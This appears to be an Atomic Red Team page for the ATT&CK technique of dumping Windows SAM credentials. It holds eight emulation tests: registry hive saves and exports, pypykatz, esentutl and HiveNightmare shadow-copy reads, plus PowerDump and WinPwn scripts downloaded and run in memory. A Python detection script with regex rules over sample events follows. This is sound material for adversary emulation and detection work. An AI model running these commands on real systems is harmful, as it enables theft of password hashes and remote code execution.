
OS Credential Dumping: Security Account Manager

Description from ATT&CK

Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.

A number of tools can be used to retrieve the SAM file through in-memory techniques:

Alternatively, the SAM can be extracted from the Registry with Reg:

  • reg save HKLM\sam sam
  • reg save HKLM\system system

Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)

Notes:

  • RID 500 account is the local, built-in administrator.
  • RID 501 is the guest account.
  • User accounts start with a RID of 1,000+.

Atomic Tests

Atomic Test #1 - Registry dump of SAM, creds, and secrets

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. The saved hives can then be processed locally using https://github.com/Neohapsis/creddump7

Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.

Supported Platforms: windows

auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44

Inputs:

None

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security

Cleanup Commands:

del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul

Atomic Test #2 - Registry parse with pypykatz

Parses registry hives to obtain stored credentials.

This test creates a Python virtual environment within the External Payloads folder; it can be deleted manually after test execution.

Supported Platforms: windows

auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263

Inputs:

Name: venv_path
Description: Path to the folder for the tactics venv
Type: string
Default Value: PathToAtomicsFolder..\ExternalPayloads\venv_t1003_002

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

"#{venv_path}\Scripts\pypykatz" live lsa

Dependencies: Run with powershell!

Description: Computer must have python 3 installed

Check Prereq Commands:

if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }

Get Prereq Commands:

New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait

Description: Computer must have venv configured at #{venv_path}

Check Prereq Commands:

if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }

Get Prereq Commands:

py -m venv "#{venv_path}"

Description: pypykatz must be installed

Check Prereq Commands:

if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }

Get Prereq Commands:

& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null

Atomic Test #3 - esentutl.exe SAM copy

Copy the SAM hive using the esentutl.exe utility. The same method can also be used to copy other files and hives, such as SYSTEM and NTUSER.dat.

Supported Platforms: windows

auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480

Inputs:

Name: file_path
Description: Path to the file to copy
Type: path
Default Value: %SystemRoot%/system32/config/SAM

Name: file_name
Description: Name of the copied file
Type: string
Default Value: SAM

Name: copy_dest
Description: Destination of the copied file
Type: string
Default Value: %temp%

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}

Cleanup Commands:

del #{copy_dest}\#{file_name} >nul 2>&1

Atomic Test #4 - PowerDump Hashes and Usernames from Registry

Executes a hashdump by reading the hashes from the registry.

Supported Platforms: windows

auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump

Dependencies: Run with powershell!

Description: PowerDump script must exist on disk at specified location

Check Prereq Commands:

if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}

Get Prereq Commands:

New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"

Atomic Test #5 - dump volume shadow copy hives with certutil

Dump hives from volume shadow copies with the certutil utility, exploiting the vulnerability known as "HiveNightmare" or "SeriousSAM" (CVE-2021-36934). This can be done with a non-admin user account.

Supported Platforms: windows

auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7

Inputs:

Name: target_hive
Description: Hive you wish to dump
Type: string
Default Value: SAM

Name: limit
Description: Limit to the number of shadow copies to iterate through when trying to copy the hive
Type: integer
Default Value: 10

Attack Commands: Run with command_prompt!

for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*

Cleanup Commands:

for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)

Atomic Test #6 - dump volume shadow copy hives with System.IO.File

Dump hives from volume shadow copies with System.IO.File (CVE-2021-36934).

Supported Platforms: windows

auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0

Inputs:

Name: target_hive
Description: Hive you wish to dump
Type: string
Default Value: SAM

Name: limit
Description: Limit to the number of shadow copies to iterate through when trying to copy the hive
Type: integer
Default Value: 10

Attack Commands: Run with powershell!

1..#{limit} | % { 
 try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
 ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}

Cleanup Commands:

1..#{limit} | % {
  rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}

Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes

Loot local Credentials - Dump SAM-File for NTLM Hashes technique, executed via the corresponding function of WinPwn.

Supported Platforms: windows

auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb

Inputs:

None

Attack Commands: Run with powershell!

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive

Atomic Test #8 - Dumping of SAM, creds, and secrets(Reg Export)

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. This test uses reg export to execute the behavior. Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.

Supported Platforms: windows

auto_generated_guid: 21df41be-cdd8-4695-a650-c3981113aa3c

Inputs:

None

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security

Cleanup Commands:

del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
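The command lines in the tests above are what a defender sees in process-creation telemetry (Sysmon Event ID 1, Windows 4688 with command-line auditing). As an added example, not Atomic Red Team code, the Python below applies one detection pattern per test family (reg save/export of SAM, SYSTEM or SECURITY for Tests #1 and #8; pypykatz live lsa for #2; esentutl /vss hive copies for #3; hive reads through HarddiskVolumeShadowCopy paths for #5 and #6; the PowerDump and WinPwn invocations for #4 and #7) to constructed sample events. The tab-separated log format, the rule names, and the sample users and paths are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Event:
    line_no: int
    utc_time: str
    user: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    rule: str
    covers: str  # tests on this page whose command line the rule matches
    event: Event


HIVES = r"(?:sam|system|security)"

# (rule name, tests covered, pattern applied to the command line)
RULES = [
    ("reg_hive_dump", "Atomic Test #1, #8",
     re.compile(r"\breg(?:\.exe)?\s+(?:save|export)\s+\"?hklm\\" + HIVES + r"\b", re.I)),
    ("pypykatz_live_lsa", "Atomic Test #2",
     re.compile(r"\bpypykatz(?:\.exe)?\"?\s+live\s+lsa\b", re.I)),
    # esentutl with /vss and a path ending in config\<hive>, in either order
    ("esentutl_vss_hive_copy", "Atomic Test #3",
     re.compile(r"\besentutl(?:\.exe)?\b(?=.*\s/vss\b)(?=.*config[\\/]" + HIVES + r"\b)", re.I)),
    # any process naming a hive inside a shadow copy; [^\\]* also matches the
    # unexpanded loop variables (%a, $_) as they appear in the page's one-liners
    ("shadow_copy_hive_read", "Atomic Test #5, #6",
     re.compile(r"HarddiskVolumeShadowCopy[^\\]*\\Windows\\System32\\config\\" + HIVES + r"\b", re.I)),
    ("powerdump_or_winpwn_samfile", "Atomic Test #4, #7",
     re.compile(r"\bInvoke-PowerDump\b|\bsamfile\s+-consoleoutput\b", re.I)),
]

# Constructed sample events (assumed format: utc_time, user, image, command_line, tab-separated).
TEMP = r"C:\Users\alice\AppData\Local\Temp"
SAMPLE_LOG_LINES = ["\t".join(row) for row in [
    ("2024-05-01T10:00:01Z", r"CORP\alice", r"C:\Windows\System32\reg.exe",
     r"reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"),             # benign
    ("2024-05-01T10:02:14Z", r"NT AUTHORITY\SYSTEM", r"C:\Windows\System32\reg.exe",
     r"reg save HKLM\sam " + TEMP + r"\sam"),                                      # Test #1
    ("2024-05-01T10:02:15Z", r"NT AUTHORITY\SYSTEM", r"C:\Windows\System32\reg.exe",
     r"reg save HKLM\system " + TEMP + r"\system"),                                # Test #1
    ("2024-05-01T10:05:40Z", r"CORP\alice", r"C:\Windows\System32\certutil.exe",
     r"certutil -hashfile C:\Users\alice\Downloads\setup.msi SHA256"),              # benign
    ("2024-05-01T10:07:03Z", r"NT AUTHORITY\SYSTEM", r"C:\Windows\System32\esentutl.exe",
     r"esentutl.exe /y /vss C:\Windows/system32/config/SAM /d " + TEMP + r"/SAM"), # Test #3
    ("2024-05-01T10:08:10Z", r"CORP\svc_backup", r"C:\Windows\System32\esentutl.exe",
     r"esentutl /p C:\ProgramData\App\cache.edb"),                                  # benign
    ("2024-05-01T10:11:27Z", r"CORP\bob", r"C:\Windows\System32\certutil.exe",
     r'certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM" C:\Users\bob\AppData\Local\Temp\SAMvss1 2'),  # Test #5
    ("2024-05-01T10:11:30Z", r"CORP\bob", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"""powershell.exe -Command 1..10 | % { try { [System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\SAM', "$env:TEMP\SAMvss$_", 'true') } catch {} }"""),  # Test #6
    ("2024-05-01T10:15:55Z", r"NT AUTHORITY\SYSTEM", r"C:\AtomicRedTeam\ExternalPayloads\venv_t1003_002\Scripts\pypykatz.exe",
     r'"C:\AtomicRedTeam\ExternalPayloads\venv_t1003_002\Scripts\pypykatz" live lsa'),  # Test #2
    ("2024-05-01T10:18:02Z", r"NT AUTHORITY\SYSTEM", r"C:\Windows\System32\reg.exe",
     r"reg export HKLM\security " + TEMP + r"\security"),                          # Test #8
    ("2024-05-01T10:20:41Z", r"NT AUTHORITY\SYSTEM", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -Command Import-Module C:\AtomicRedTeam\ExternalPayloads\PowerDump.ps1; Invoke-PowerDump"),  # Test #4
    ("2024-05-01T10:25:00Z", r"CORP\svc_backup", r"C:\Windows\System32\reg.exe",
     r"reg save HKLM\Software\MyApp C:\Backup\myapp.hiv"),                          # benign: not a credential hive
]]


def parse_line(line_no: int, line: str) -> Optional[Event]:
    """Split one tab-separated event; a malformed line is skipped rather than fatal."""
    parts = line.rstrip("\n").split("\t", 3)
    if len(parts) != 4:
        return None
    return Event(line_no, *parts)


def scan(lines: List[str]) -> List[Finding]:
    """Apply every rule to every event's command line, in input order."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, start=1):
        event = parse_line(n, line)
        if event is None:
            continue
        for rule, covers, pattern in RULES:
            if pattern.search(event.command_line):
                findings.append(Finding(rule, covers, event))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


def shadow_copy_reads_by_non_system(findings: List[Finding]) -> List[Event]:
    """Test #5 notes the shadow-copy read needs no admin rights (CVE-2021-36934), so a
    hive read from a shadow copy by anything other than SYSTEM deserves a closer look."""
    return [f.event for f in findings
            if f.rule == "shadow_copy_hive_read" and f.event.user.upper() != r"NT AUTHORITY\SYSTEM"]


if __name__ == "__main__":
    found = scan(SAMPLE_LOG_LINES)
    for f in found:
        print(f"line {f.event.line_no:2d}  {f.rule:28s} ({f.covers})  user={f.event.user}")
    print(summarize(found))
```

Two caveats apply when using patterns like these on real telemetry. Tests #4 and #7 load their scripts in memory, so the process command line shows only the loader (or nothing useful when the script is pasted into an interactive session); those are better caught with PowerShell script block logging (Event ID 4104) than with process creation events. The reg rule also matches a save of a subkey such as HKLM\SYSTEM\CurrentControlSet, which still carries part of the hive and is worth reviewing, while the benign save of HKLM\Software\MyApp in the sample is correctly ignored.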
